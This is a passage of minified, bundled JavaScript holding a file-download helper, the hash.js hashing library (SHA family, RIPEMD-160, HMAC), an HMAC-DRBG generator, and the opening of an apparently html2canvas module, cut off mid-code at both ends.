M=F.URL||F.webkitURL,p=document.createElement("a");p.download=_=_||b.name||"download",p.rel="noopener","string"==typeof b?(p.href=b,p.origin===location.origin?Q(p):I(p.href)?ae(b,_,y):Q(p,p.target="_blank")):(p.href=M.createObjectURL(b),setTimeout(function(){M.revokeObjectURL(p.href)},4e4),setTimeout(function(){Q(p)},0))}:"msSaveOrOpenBlob"in navigator?function(b,_,y){if(_=_||b.name||"download","string"!=typeof b)navigator.msSaveOrOpenBlob(function $(b,_){return void 0===_?_={autoBom:!1}:"object"!=typeof _&&(console.warn("Deprecated: Expected third argument to be a object"),_={autoBom:!_}),_.autoBom&&/^\s*(?:text\/\S*|application\/xml|\S*\/\S*\+xml)\s*;.*charset\s*=\s*utf-8/i.test(b.type)?new Blob(["\ufeff",b],{type:b.type}):b}(b,y),_);else if(I(b))ae(b,_,y);else{var M=document.createElement("a");M.href=b,M.target="_blank",setTimeout(function(){Q(M)})}}:function(b,_,y,M){if((M=M||open("","_blank"))&&(M.document.title=M.document.body.innerText="downloading..."),"string"==typeof b)return ae(b,_,y);var p="application/octet-stream"===b.type,D=/constructor/i.test(F.HTMLElement)||F.safari,w=/CriOS\/[\d]+/.test(navigator.userAgent);if((w||p&&D||E)&&"undefined"!=typeof FileReader){var x=new FileReader;x.onloadend=function(){var U=x.result;U=w?U:U.replace(/^data:[^;]*;/,"data:attachment/file;"),M?M.location.href=U:location=U,M=null},x.readAsDataURL(b)}else{var S=F.URL||F.webkitURL,O=S.createObjectURL(b);M?M.location=O:location.href=O,M=null,setTimeout(function(){S.revokeObjectURL(O)},4e4)}});F.saveAs=g.saveAs=g,Pe.exports=g}.apply(we,[]))&&(Pe.exports=j)},5110:(Pe,we,de)=>{"use strict";var ie=de(265).Buffer,j=de(4539).Transform;function I(Q){j.call(this),this._block=ie.allocUnsafe(Q),this._blockSize=Q,this._blockOffset=0,this._length=[0,0,0,0],this._finalized=!1}de(2270)(I,j),I.prototype._transform=function(Q,F,E){var g=null;try{this.update(Q,F)}catch(b){g=b}E(g)},I.prototype._flush=function(Q){var F=null;try{this.push(this.digest())}catch(E){F=E}Q(F)},I.prototype.update=function(Q,F){if(function ae(Q,F){if(!ie.isBuffer(Q)&&"string"!=typeof Q)throw new TypeError(F+" must be a string or a buffer")}(Q,"Data"),this._finalized)throw new Error("Digest already called");ie.isBuffer(Q)||(Q=ie.from(Q,F));for(var E=this._block,g=0;this._blockOffset+Q.length-g>=this._blockSize;){for(var b=this._blockOffset;b<this._blockSize;)E[b++]=Q[g++];this._update(),this._blockOffset=0}for(;g<Q.length;)E[this._blockOffset++]=Q[g++];for(var _=0,y=8*Q.length;y>0;++_)this._length[_]+=y,(y=this._length[_]/4294967296|0)>0&&(this._length[_]-=4294967296*y);return this},I.prototype._update=function(){throw new Error("_update is not implemented")},I.prototype.digest=function(Q){if(this._finalized)throw new Error("Digest already called");this._finalized=!0;var F=this._digest();void 0!==Q&&(F=F.toString(Q)),this._block.fill(0),this._blockOffset=0;for(var E=0;E<4;++E)this._length[E]=0;return F},I.prototype._digest=function(){throw new Error("_digest is not implemented")},Pe.exports=I},8414:(Pe,we,de)=>{var ie=we;ie.utils=de(6378),ie.common=de(7774),ie.sha=de(7452),ie.ripemd=de(7699),ie.hmac=de(5351),ie.sha1=ie.sha.sha1,ie.sha256=ie.sha.sha256,ie.sha224=ie.sha.sha224,ie.sha384=ie.sha.sha384,ie.sha512=ie.sha.sha512,ie.ripemd160=ie.ripemd.ripemd160},7774:(Pe,we,de)=>{"use strict";var ie=de(6378),j=de(490);function $(){this.pending=null,this.pendingTotal=0,this.blockSize=this.constructor.blockSize,this.outSize=this.constructor.outSize,this.hmacStrength=this.constructor.hmacStrength,this.padLength=this.constructor.padLength/8,this.endian="big",this._delta8=this.blockSize/8,this._delta32=this.blockSize/32}we.BlockHash=$,$.prototype.update=function(I,Q){if(I=ie.toArray(I,Q),this.pending=this.pending?this.pending.concat(I):I,this.pendingTotal+=I.length,this.pending.length>=this._delta8){var F=(I=this.pending).length%this._delta8;this.pending=I.slice(I.length-F,I.length),0===this.pending.length&&(this.pending=null),I=ie.join32(I,0,I.length-F,this.endian);for(var E=0;E<I.length;E+=this._delta32)this._update(I,E,E+this._delta32)}return this},$.prototype.digest=function(I){return this.update(this._pad()),j(null===this.pending),this._digest(I)},$.prototype._pad=function(){var I=this.pendingTotal,Q=this._delta8,F=Q-(I+this.padLength)%Q,E=new Array(F+this.padLength);E[0]=128;for(var g=1;g<F;g++)E[g]=0;if(I<<=3,"big"===this.endian){for(var b=8;b<this.padLength;b++)E[g++]=0;E[g++]=0,E[g++]=0,E[g++]=0,E[g++]=0,E[g++]=I>>>24&255,E[g++]=I>>>16&255,E[g++]=I>>>8&255,E[g++]=255&I}else for(E[g++]=255&I,E[g++]=I>>>8&255,E[g++]=I>>>16&255,E[g++]=I>>>24&255,E[g++]=0,E[g++]=0,E[g++]=0,E[g++]=0,b=8;b<this.padLength;b++)E[g++]=0;return E}},5351:(Pe,we,de)=>{"use strict";var ie=de(6378),j=de(490);function $(ae,I,Q){if(!(this instanceof $))return new $(ae,I,Q);this.Hash=ae,this.blockSize=ae.blockSize/8,this.outSize=ae.outSize/8,this.inner=null,this.outer=null,this._init(ie.toArray(I,Q))}Pe.exports=$,$.prototype._init=function(I){I.length>this.blockSize&&(I=(new this.Hash).update(I).digest()),j(I.length<=this.blockSize);for(var Q=I.length;Q<this.blockSize;Q++)I.push(0);for(Q=0;Q<I.length;Q++)I[Q]^=54;for(this.inner=(new this.Hash).update(I),Q=0;Q<I.length;Q++)I[Q]^=106;this.outer=(new this.Hash).update(I)},$.prototype.update=function(I,Q){return this.inner.update(I,Q),this},$.prototype.digest=function(I){return this.outer.update(this.inner.digest()),this.outer.digest(I)}},7699:(Pe,we,de)=>{"use strict";var ie=de(6378),j=de(7774),$=ie.rotl32,ae=ie.sum32,I=ie.sum32_3,Q=ie.sum32_4,F=j.BlockHash;function E(){if(!(this instanceof E))return new E;F.call(this),this.h=[1732584193,4023233417,2562383102,271733878,3285377520],this.endian="little"}function g(w,x,S,O){return w<=15?x^S^O:w<=31?x&S|~x&O:w<=47?(x|~S)^O:w<=63?x&O|S&~O:x^(S|~O)}function _(w){return w<=15?1352829926:w<=31?1548603684:w<=47?1836072691:w<=63?2053994217:0}ie.inherits(E,F),we.ripemd160=E,E.blockSize=512,E.outSize=160,E.hmacStrength=192,E.padLength=64,E.prototype._update=function(x,S){for(var O=this.h[0],U=this.h[1],K=this.h[2],ee=this.h[3],se=this.h[4],ve=O,le=U,ye=K,z=ee,l=se,f=0;f<80;f++){var A=ae($(Q(O,g(f,U,K,ee),x[y[f]+S],(w=f)<=15?0:w<=31?1518500249:w<=47?1859775393:w<=63?2400959708:2840853838),p[f]),se);O=se,se=ee,ee=$(K,10),K=U,U=A,A=ae($(Q(ve,g(79-f,le,ye,z),x[M[f]+S],_(f)),D[f]),l),ve=l,l=z,z=$(ye,10),ye=le,le=A}var w;A=I(this.h[1],K,z),this.h[1]=I(this.h[2],ee,l),this.h[2]=I(this.h[3],se,ve),this.h[3]=I(this.h[4],O,le),this.h[4]=I(this.h[0],U,ye),this.h[0]=A},E.prototype._digest=function(x){return"hex"===x?ie.toHex32(this.h,"little"):ie.split32(this.h,"little")};var y=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,7,4,13,1,10,6,15,3,12,0,9,5,2,14,11,8,3,10,14,4,9,15,8,1,2,7,0,6,13,11,5,12,1,9,11,10,0,8,12,4,13,3,7,15,14,5,6,2,4,0,5,9,7,12,2,10,14,1,3,8,11,6,15,13],M=[5,14,7,0,9,2,11,4,13,6,15,8,1,10,3,12,6,11,3,7,0,13,5,10,14,15,8,12,4,9,1,2,15,5,1,3,7,14,6,9,11,8,12,2,10,0,4,13,8,6,4,1,3,11,15,0,5,12,2,13,9,7,10,14,12,15,10,4,1,5,8,7,6,2,13,14,0,3,9,11],p=[11,14,15,12,5,8,7,9,11,13,14,15,6,7,9,8,7,6,8,13,11,9,7,15,7,12,15,9,11,7,13,12,11,13,6,7,14,9,13,15,14,8,13,6,5,12,7,5,11,12,14,15,14,15,9,8,9,14,5,6,8,6,5,12,9,15,5,11,6,8,13,12,5,12,13,14,11,8,5,6],D=[8,9,9,11,13,15,15,5,7,7,8,11,14,14,12,6,9,13,15,7,12,8,9,11,7,7,12,7,6,15,13,11,9,7,15,11,8,6,6,14,12,13,5,14,13,13,7,5,15,5,8,11,14,14,6,14,6,9,12,9,12,5,15,8,8,5,12,9,12,5,14,6,8,13,6,5,15,13,11,11]},7452:(Pe,we,de)=>{"use strict";we.sha1=de(1721),we.sha224=de(3455),we.sha256=de(7756),we.sha384=de(925),we.sha512=de(617)},1721:(Pe,we,de)=>{"use strict";var ie=de(6378),j=de(7774),$=de(9524),ae=ie.rotl32,I=ie.sum32,Q=ie.sum32_5,F=$.ft_1,E=j.BlockHash,g=[1518500249,1859775393,2400959708,3395469782];function b(){if(!(this instanceof b))return new b;E.call(this),this.h=[1732584193,4023233417,2562383102,271733878,3285377520],this.W=new Array(80)}ie.inherits(b,E),Pe.exports=b,b.blockSize=512,b.outSize=160,b.hmacStrength=80,b.padLength=64,b.prototype._update=function(y,M){for(var p=this.W,D=0;D<16;D++)p[D]=y[M+D];for(;D<p.length;D++)p[D]=ae(p[D-3]^p[D-8]^p[D-14]^p[D-16],1);var w=this.h[0],x=this.h[1],S=this.h[2],O=this.h[3],U=this.h[4];for(D=0;D<p.length;D++){var K=~~(D/20),ee=Q(ae(w,5),F(K,x,S,O),U,p[D],g[K]);U=O,O=S,S=ae(x,30),x=w,w=ee}this.h[0]=I(this.h[0],w),this.h[1]=I(this.h[1],x),this.h[2]=I(this.h[2],S),this.h[3]=I(this.h[3],O),this.h[4]=I(this.h[4],U)},b.prototype._digest=function(y){return"hex"===y?ie.toHex32(this.h,"big"):ie.split32(this.h,"big")}},3455:(Pe,we,de)=>{"use strict";var ie=de(6378),j=de(7756);function $(){if(!(this instanceof $))return new $;j.call(this),this.h=[3238371032,914150663,812702999,4144912697,4290775857,1750603025,1694076839,3204075428]}ie.inherits($,j),Pe.exports=$,$.blockSize=512,$.outSize=224,$.hmacStrength=192,$.padLength=64,$.prototype._digest=function(I){return"hex"===I?ie.toHex32(this.h.slice(0,7),"big"):ie.split32(this.h.slice(0,7),"big")}},7756:(Pe,we,de)=>{"use strict";var ie=de(6378),j=de(7774),$=de(9524),ae=de(490),I=ie.sum32,Q=ie.sum32_4,F=ie.sum32_5,E=$.ch32,g=$.maj32,b=$.s0_256,_=$.s1_256,y=$.g0_256,M=$.g1_256,p=j.BlockHash,D=[1116352408,1899447441,3049323471,3921009573,961987163,1508970993,2453635748,2870763221,3624381080,310598401,607225278,1426881987,1925078388,2162078206,2614888103,3248222580,3835390401,4022224774,264347078,604807628,770255983,1249150122,1555081692,1996064986,2554220882,2821834349,2952996808,3210313671,3336571891,3584528711,113926993,338241895,666307205,773529912,1294757372,1396182291,1695183700,1986661051,2177026350,2456956037,2730485921,2820302411,3259730800,3345764771,3516065817,3600352804,4094571909,275423344,430227734,506948616,659060556,883997877,958139571,1322822218,1537002063,1747873779,1955562222,2024104815,2227730452,2361852424,2428436474,2756734187,3204031479,3329325298];function w(){if(!(this instanceof w))return new w;p.call(this),this.h=[1779033703,3144134277,1013904242,2773480762,1359893119,2600822924,528734635,1541459225],this.k=D,this.W=new Array(64)}ie.inherits(w,p),Pe.exports=w,w.blockSize=512,w.outSize=256,w.hmacStrength=192,w.padLength=64,w.prototype._update=function(S,O){for(var U=this.W,K=0;K<16;K++)U[K]=S[O+K];for(;K<U.length;K++)U[K]=Q(M(U[K-2]),U[K-7],y(U[K-15]),U[K-16]);var ee=this.h[0],se=this.h[1],ve=this.h[2],le=this.h[3],ye=this.h[4],z=this.h[5],l=this.h[6],f=this.h[7];for(ae(this.k.length===U.length),K=0;K<U.length;K++){var A=F(f,_(ye),E(ye,z,l),this.k[K],U[K]),v=I(b(ee),g(ee,se,ve));f=l,l=z,z=ye,ye=I(le,A),le=ve,ve=se,se=ee,ee=I(A,v)}this.h[0]=I(this.h[0],ee),this.h[1]=I(this.h[1],se),this.h[2]=I(this.h[2],ve),this.h[3]=I(this.h[3],le),this.h[4]=I(this.h[4],ye),this.h[5]=I(this.h[5],z),this.h[6]=I(this.h[6],l),this.h[7]=I(this.h[7],f)},w.prototype._digest=function(S){return"hex"===S?ie.toHex32(this.h,"big"):ie.split32(this.h,"big")}},925:(Pe,we,de)=>{"use strict";var ie=de(6378),j=de(617);function $(){if(!(this instanceof $))return new $;j.call(this),this.h=[3418070365,3238371032,1654270250,914150663,2438529370,812702999,355462360,4144912697,1731405415,4290775857,2394180231,1750603025,3675008525,1694076839,1203062813,3204075428]}ie.inherits($,j),Pe.exports=$,$.blockSize=1024,$.outSize=384,$.hmacStrength=192,$.padLength=128,$.prototype._digest=function(I){return"hex"===I?ie.toHex32(this.h.slice(0,12),"big"):ie.split32(this.h.slice(0,12),"big")}},617:(Pe,we,de)=>{"use strict";var ie=de(6378),j=de(7774),$=de(490),ae=ie.rotr64_hi,I=ie.rotr64_lo,Q=ie.shr64_hi,F=ie.shr64_lo,E=ie.sum64,g=ie.sum64_hi,b=ie.sum64_lo,_=ie.sum64_4_hi,y=ie.sum64_4_lo,M=ie.sum64_5_hi,p=ie.sum64_5_lo,D=j.BlockHash,w=[1116352408,3609767458,1899447441,602891725,3049323471,3964484399,3921009573,2173295548,961987163,4081628472,1508970993,3053834265,2453635748,2937671579,2870763221,3664609560,3624381080,2734883394,310598401,1164996542,607225278,1323610764,1426881987,3590304994,1925078388,4068182383,2162078206,991336113,2614888103,633803317,3248222580,3479774868,3835390401,2666613458,4022224774,944711139,264347078,2341262773,604807628,2007800933,770255983,1495990901,1249150122,1856431235,1555081692,3175218132,1996064986,2198950837,2554220882,3999719339,2821834349,766784016,2952996808,2566594879,3210313671,3203337956,3336571891,1034457026,3584528711,2466948901,113926993,3758326383,338241895,168717936,666307205,1188179964,773529912,1546045734,1294757372,1522805485,1396182291,2643833823,1695183700,2343527390,1986661051,1014477480,2177026350,1206759142,2456956037,344077627,2730485921,1290863460,2820302411,3158454273,3259730800,3505952657,3345764771,106217008,3516065817,3606008344,3600352804,1432725776,4094571909,1467031594,275423344,851169720,430227734,3100823752,506948616,1363258195,659060556,3750685593,883997877,3785050280,958139571,3318307427,1322822218,3812723403,1537002063,2003034995,1747873779,3602036899,1955562222,1575990012,2024104815,1125592928,2227730452,2716904306,2361852424,442776044,2428436474,593698344,2756734187,3733110249,3204031479,2999351573,3329325298,3815920427,3391569614,3928383900,3515267271,566280711,3940187606,3454069534,4118630271,4000239992,116418474,1914138554,174292421,2731055270,289380356,3203993006,460393269,320620315,685471733,587496836,852142971,1086792851,1017036298,365543100,1126000580,2618297676,1288033470,3409855158,1501505948,4234509866,1607167915,987167468,1816402316,1246189591];function x(){if(!(this instanceof x))return new x;D.call(this),this.h=[1779033703,4089235720,3144134277,2227873595,1013904242,4271175723,2773480762,1595750129,1359893119,2917565137,2600822924,725511199,528734635,4215389547,1541459225,327033209],this.k=w,this.W=new Array(160)}function S(A,v,P,G,X){var L=A&P^~A&X;return L<0&&(L+=4294967296),L}function O(A,v,P,G,X,L){var h=v&G^~v&L;return h<0&&(h+=4294967296),h}function U(A,v,P,G,X){var L=A&P^A&X^P&X;return L<0&&(L+=4294967296),L}function K(A,v,P,G,X,L){var h=v&G^v&L^G&L;return h<0&&(h+=4294967296),h}function ee(A,v){var L=ae(A,v,28)^ae(v,A,2)^ae(v,A,7);return L<0&&(L+=4294967296),L}function se(A,v){var L=I(A,v,28)^I(v,A,2)^I(v,A,7);return L<0&&(L+=4294967296),L}function ve(A,v){var L=ae(A,v,14)^ae(A,v,18)^ae(v,A,9);return L<0&&(L+=4294967296),L}function le(A,v){var L=I(A,v,14)^I(A,v,18)^I(v,A,9);return L<0&&(L+=4294967296),L}function ye(A,v){var L=ae(A,v,1)^ae(A,v,8)^Q(A,v,7);return L<0&&(L+=4294967296),L}function z(A,v){var L=I(A,v,1)^I(A,v,8)^F(A,v,7);return L<0&&(L+=4294967296),L}function l(A,v){var L=ae(A,v,19)^ae(v,A,29)^Q(A,v,6);return L<0&&(L+=4294967296),L}function f(A,v){var L=I(A,v,19)^I(v,A,29)^F(A,v,6);return L<0&&(L+=4294967296),L}ie.inherits(x,D),Pe.exports=x,x.blockSize=1024,x.outSize=512,x.hmacStrength=192,x.padLength=128,x.prototype._prepareBlock=function(v,P){for(var G=this.W,X=0;X<32;X++)G[X]=v[P+X];for(;X<G.length;X+=2){var L=l(G[X-4],G[X-3]),h=f(G[X-4],G[X-3]),R=G[X-14],J=G[X-13],Z=ye(G[X-30],G[X-29]),ue=z(G[X-30],G[X-29]),Ie=G[X-32],Ae=G[X-31];G[X]=_(L,h,R,J,Z,ue,Ie,Ae),G[X+1]=y(L,h,R,J,Z,ue,Ie,Ae)}},x.prototype._update=function(v,P){this._prepareBlock(v,P);var G=this.W,X=this.h[0],L=this.h[1],h=this.h[2],R=this.h[3],J=this.h[4],Z=this.h[5],ue=this.h[6],Ie=this.h[7],Ae=this.h[8],Ue=this.h[9],Xe=this.h[10],He=this.h[11],Be=this.h[12],qe=this.h[13],De=this.h[14],Ve=this.h[15];$(this.k.length===G.length);for(var ze=0;ze<G.length;ze+=2){var me=De,Ke=Ve,rt=ve(Ae,Ue),Ge=le(Ae,Ue),Qe=S(Ae,0,Xe,0,Be),ht=O(0,Ue,0,He,0,qe),mt=this.k[ze],lt=this.k[ze+1],ft=G[ze],xe=G[ze+1],We=M(me,Ke,rt,Ge,Qe,ht,mt,lt,ft,xe),Je=p(me,Ke,rt,Ge,Qe,ht,mt,lt,ft,xe);me=ee(X,L),Ke=se(X,L),rt=U(X,0,h,0,J),Ge=K(0,L,0,R,0,Z);var Oe=g(me,Ke,rt,Ge),Te=b(me,Ke,rt,Ge);De=Be,Ve=qe,Be=Xe,qe=He,Xe=Ae,He=Ue,Ae=g(ue,Ie,We,Je),Ue=b(Ie,Ie,We,Je),ue=J,Ie=Z,J=h,Z=R,h=X,R=L,X=g(We,Je,Oe,Te),L=b(We,Je,Oe,Te)}E(this.h,0,X,L),E(this.h,2,h,R),E(this.h,4,J,Z),E(this.h,6,ue,Ie),E(this.h,8,Ae,Ue),E(this.h,10,Xe,He),E(this.h,12,Be,qe),E(this.h,14,De,Ve)},x.prototype._digest=function(v){return"hex"===v?ie.toHex32(this.h,"big"):ie.split32(this.h,"big")}},9524:(Pe,we,de)=>{"use strict";var j=de(6378).rotr32;function ae(_,y,M){return _&y^~_&M}function I(_,y,M){return _&y^_&M^y&M}function Q(_,y,M){return _^y^M}we.ft_1=function $(_,y,M,p){return 0===_?ae(y,M,p):1===_||3===_?Q(y,M,p):2===_?I(y,M,p):void 0},we.ch32=ae,we.maj32=I,we.p32=Q,we.s0_256=function F(_){return j(_,2)^j(_,13)^j(_,22)},we.s1_256=function E(_){return j(_,6)^j(_,11)^j(_,25)},we.g0_256=function g(_){return j(_,7)^j(_,18)^_>>>3},we.g1_256=function b(_){return j(_,17)^j(_,19)^_>>>10}},6378:(Pe,we,de)=>{"use strict";var ie=de(490),j=de(2270);function $(f,A){return!(55296!=(64512&f.charCodeAt(A))||A<0||A+1>=f.length)&&56320==(64512&f.charCodeAt(A+1))}function Q(f){return(f>>>24|f>>>8&65280|f<<8&16711680|(255&f)<<24)>>>0}function E(f){return 1===f.length?"0"+f:f}function g(f){return 7===f.length?"0"+f:6===f.length?"00"+f:5===f.length?"000"+f:4===f.length?"0000"+f:3===f.length?"00000"+f:2===f.length?"000000"+f:1===f.length?"0000000"+f:f}we.inherits=j,we.toArray=function ae(f,A){if(Array.isArray(f))return f.slice();if(!f)return[];var v=[];if("string"==typeof f)if(A){if("hex"===A)for((f=f.replace(/[^a-z0-9]+/gi,"")).length%2!=0&&(f="0"+f),G=0;G<f.length;G+=2)v.push(parseInt(f[G]+f[G+1],16))}else for(var P=0,G=0;G<f.length;G++){var X=f.charCodeAt(G);X<128?v[P++]=X:X<2048?(v[P++]=X>>6|192,v[P++]=63&X|128):$(f,G)?(X=65536+((1023&X)<<10)+(1023&f.charCodeAt(++G)),v[P++]=X>>18|240,v[P++]=X>>12&63|128,v[P++]=X>>6&63|128,v[P++]=63&X|128):(v[P++]=X>>12|224,v[P++]=X>>6&63|128,v[P++]=63&X|128)}else for(G=0;G<f.length;G++)v[G]=0|f[G];return v},we.toHex=function I(f){for(var A="",v=0;v<f.length;v++)A+=E(f[v].toString(16));return A},we.htonl=Q,we.toHex32=function F(f,A){for(var v="",P=0;P<f.length;P++){var G=f[P];"little"===A&&(G=Q(G)),v+=g(G.toString(16))}return v},we.zero2=E,we.zero8=g,we.join32=function b(f,A,v,P){var G=v-A;ie(G%4==0);for(var X=new Array(G/4),L=0,h=A;L<X.length;L++,h+=4)X[L]=("big"===P?f[h]<<24|f[h+1]<<16|f[h+2]<<8|f[h+3]:f[h+3]<<24|f[h+2]<<16|f[h+1]<<8|f[h])>>>0;return X},we.split32=function _(f,A){for(var v=new Array(4*f.length),P=0,G=0;P<f.length;P++,G+=4){var X=f[P];"big"===A?(v[G]=X>>>24,v[G+1]=X>>>16&255,v[G+2]=X>>>8&255,v[G+3]=255&X):(v[G+3]=X>>>24,v[G+2]=X>>>16&255,v[G+1]=X>>>8&255,v[G]=255&X)}return v},we.rotr32=function y(f,A){return f>>>A|f<<32-A},we.rotl32=function M(f,A){return f<<A|f>>>32-A},we.sum32=function p(f,A){return f+A>>>0},we.sum32_3=function D(f,A,v){return f+A+v>>>0},we.sum32_4=function w(f,A,v,P){return f+A+v+P>>>0},we.sum32_5=function x(f,A,v,P,G){return f+A+v+P+G>>>0},we.sum64=function S(f,A,v,P){var L=P+f[A+1]>>>0;f[A]=(L<P?1:0)+v+f[A]>>>0,f[A+1]=L},we.sum64_hi=function O(f,A,v,P){return(A+P>>>0<A?1:0)+f+v>>>0},we.sum64_lo=function U(f,A,v,P){return A+P>>>0},we.sum64_4_hi=function K(f,A,v,P,G,X,L,h){var R=0,J=A;return R+=(J=J+P>>>0)<A?1:0,R+=(J=J+X>>>0)<X?1:0,f+v+G+L+(R+=(J=J+h>>>0)<h?1:0)>>>0},we.sum64_4_lo=function ee(f,A,v,P,G,X,L,h){return A+P+X+h>>>0},we.sum64_5_hi=function se(f,A,v,P,G,X,L,h,R,J){var Z=0,ue=A;return Z+=(ue=ue+P>>>0)<A?1:0,Z+=(ue=ue+X>>>0)<X?1:0,Z+=(ue=ue+h>>>0)<h?1:0,f+v+G+L+R+(Z+=(ue=ue+J>>>0)<J?1:0)>>>0},we.sum64_5_lo=function ve(f,A,v,P,G,X,L,h,R,J){return A+P+X+h+J>>>0},we.rotr64_hi=function le(f,A,v){return(A<<32-v|f>>>v)>>>0},we.rotr64_lo=function ye(f,A,v){return(f<<32-v|A>>>v)>>>0},we.shr64_hi=function z(f,A,v){return f>>>v},we.shr64_lo=function l(f,A,v){return(f<<32-v|A>>>v)>>>0}},8116:(Pe,we,de)=>{"use strict";var ie=de(8414),j=de(4108),$=de(490);function ae(I){if(!(this instanceof ae))return new ae(I);this.hash=I.hash,this.predResist=!!I.predResist,this.outLen=this.hash.outSize,this.minEntropy=I.minEntropy||this.hash.hmacStrength,this._reseed=null,this.reseedInterval=null,this.K=null,this.V=null;var Q=j.toArray(I.entropy,I.entropyEnc||"hex"),F=j.toArray(I.nonce,I.nonceEnc||"hex"),E=j.toArray(I.pers,I.persEnc||"hex");$(Q.length>=this.minEntropy/8,"Not enough entropy. Minimum is: "+this.minEntropy+" bits"),this._init(Q,F,E)}Pe.exports=ae,ae.prototype._init=function(Q,F,E){var g=Q.concat(F).concat(E);this.K=new Array(this.outLen/8),this.V=new Array(this.outLen/8);for(var b=0;b<this.V.length;b++)this.K[b]=0,this.V[b]=1;this._update(g),this._reseed=1,this.reseedInterval=281474976710656},ae.prototype._hmac=function(){return new ie.hmac(this.hash,this.K)},ae.prototype._update=function(Q){var F=this._hmac().update(this.V).update([0]);Q&&(F=F.update(Q)),this.K=F.digest(),this.V=this._hmac().update(this.V).digest(),Q&&(this.K=this._hmac().update(this.V).update([1]).update(Q).digest(),this.V=this._hmac().update(this.V).digest())},ae.prototype.reseed=function(Q,F,E,g){"string"!=typeof F&&(g=E,E=F,F=null),Q=j.toArray(Q,F),E=j.toArray(E,g),$(Q.length>=this.minEntropy/8,"Not enough entropy. Minimum is: "+this.minEntropy+" bits"),this._update(Q.concat(E||[])),this._reseed=1},ae.prototype.generate=function(Q,F,E,g){if(this._reseed>this.reseedInterval)throw new Error("Reseed is required");"string"!=typeof F&&(g=E,E=F,F=null),E&&(E=j.toArray(E,g||"hex"),this._update(E));for(var b=[];b.length<Q;)this.V=this._hmac().update(this.V).digest(),b=b.concat(this.V);var _=b.slice(0,Q);return this._update(E),this._reseed++,j.encode(_,F)}},5818:function(Pe){Pe.exports=function(){"use strict";var we=function(fe,ce){return(we=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(ge,_e){ge.__proto__=_e}||function(ge,_e){for(var je in _e)Object.prototype.hasOwnProperty.call(_e,je)&&(ge[je]=_e[je])})(fe,ce)};function de(fe,ce){if("function"!=typeof ce&&null!==ce)throw new TypeError("Class extends value "+String(ce)+" is not a constructor or null");function ge(){this.constructor=fe}we(fe,ce),fe.prototype=null===ce?Object.create(ce):(ge.prototype=ce.prototype,new ge)}var ie=function(){return ie=Object.assign||function(ce){for(var ge,_e=1,je=arguments.length;_e<je;_e++)for(var tt in ge=arguments[_e])Object.prototype.hasOwnProperty.call(ge,tt)&&(ce[tt]=ge[tt]);return ce},ie.apply(this,arguments)};function j(fe,ce,ge,_e){return new(ge||(ge=Promise))(function(tt,dt){function _t(Lt){try{kt(_e.next(Lt))}catch(Ht){dt(Ht)}}function gt(Lt){try{kt(_e.throw(Lt))}catch(Ht){dt(Ht)}}function kt(Lt){Lt.done?tt(Lt.value):function je(tt){return tt instanceof ge?tt:new ge(function(dt){dt(tt)})}(Lt.value).then(_t,gt)}kt((_e=_e.apply(fe,ce||[])).next())})}function $(fe,ce){var _e,je,tt,dt,ge={label:0,sent:function(){if(1&tt[0])throw tt[1];return tt[1]},trys:[],ops:[]};return dt={next:_t(0),throw:_t(1),return:_t(2)},"function"==typeof Symbol&&(dt[Symbol.iterator]=function(){return this}),dt;function _t(kt){return function(Lt){return function gt(kt){if(_e)throw new TypeError("Generator is already executing.");for(;ge;)try{if(_e=1,je&&(tt=2&kt[0]?je.return:kt[0]?je.throw||((tt=je.return)&&tt.call(je),0):je.next)&&!(tt=tt.call(je,kt[1])).done)return tt;switch(je=0,tt&&(kt=[2&kt[0],tt.value]),kt[0]){case 0:case 1:tt=kt;break;case 4:return ge.label++,{value:kt[1],done:!1};case 5:ge.label++,je=kt[1],kt=[0];continue;case 7:kt=ge.ops.pop(),ge.trys.pop();continue;default:if(!(tt=(tt=ge.trys).length>0&&tt[tt.length-1])&&(6===kt[0]||2===kt[0])){ge=0;continue}if(3===kt[0]&&(!tt||kt[1]>tt[0]&&kt[1]<tt[3])){ge.label=kt[1];break}if(6===kt[0]&&ge.label<tt[1]){ge.label=tt[1],tt=kt;break}if(tt&&ge.label<tt[2]){ge.label=tt[2],ge.ops.push(kt);break}tt[2]&&ge.ops.pop(),ge.trys.pop();continue}kt=ce.call(fe,ge)}catch(Lt){kt=[6,Lt],je=0}finally{_e=tt=0}if(5&kt[0])throw kt[1];return{value:kt[0]?kt[1]:void 0,done:!0}}([kt,Lt])}}}function ae(fe,ce,ge){if(ge||2===arguments.length)for(var tt,_e=0,je=ce.length;_e<je;_e++)(tt||!(_e in ce))&&(tt||(tt=Array.prototype.slice.call(ce,0,_e)),tt[_e]=ce[_e]);return fe.concat(tt||ce)}for(var I=function(){function fe(ce,ge,_e,je){this.left=ce,this.top=ge,this.width=_e,this.height=je}return fe.prototype.add=function(ce,ge,_e,je){return new fe(this.left+ce,this.top+ge,this.width+_e,this.height+je)},fe.fromClientRect=function(ce,ge){return new fe(ge.left+ce.windowBounds.left,ge.top+ce.windowBounds.top,ge.width,ge.height)},fe.fromDOMRectList=function(ce,ge){var _e=Array.from(ge).find(function(je){return 0!==je.width});return _e?new fe(_e.left+ce.windowBounds.left,_e.top+ce.windowBounds.top,_e.width,_e.height):fe.EMPTY},fe.EMPTY=new fe(0,0,0,0),fe}(),Q=function(fe,ce){return I.fromClientRect(fe,ce.getBoundingClientRect())},E=function(fe){for(var ce=[],ge=0,_e=fe.length;ge<_e;){var je=fe.charCodeAt(ge++);if(je>=55296&&je<=56319&&ge<_e){var tt=fe.charCodeAt(ge++);56320==(64512&tt)?ce.push(((1023&je)<<10)+(1023&tt)+65536):(ce.push(je),ge--)}else ce.push(je)}return ce},g=function(){for(var fe=[],ce=0;ce<arguments.length;ce++)fe[ce]=arguments[ce];if(String.fromCodePoint)return String.fromCodePoint.apply(String,fe);var ge=fe.length;if(!ge)return"";for(var _e=[],je=-1,tt="";++je<ge;){var dt=fe[je];dt<=65535?_e.push(dt):_e.push(55296+((dt-=65536)>>10),dt%1024+56320),(je+1===ge||_e.length>16384)&&(tt+=String.fromCharCode.apply(String,_e),_e.length=0)}return tt},b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",_="undefined"==typeof Uint8Array?[]:new Uint8Array(256),y=0;y<b.length;y++)_[b.charCodeAt(y)]=y;for(var M="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",p="undefined"==typeof Uint8Array?[]:new Uint8Array(256),D=0;D<M.length;D++)p[M.charCodeAt(D)]=D;for(var 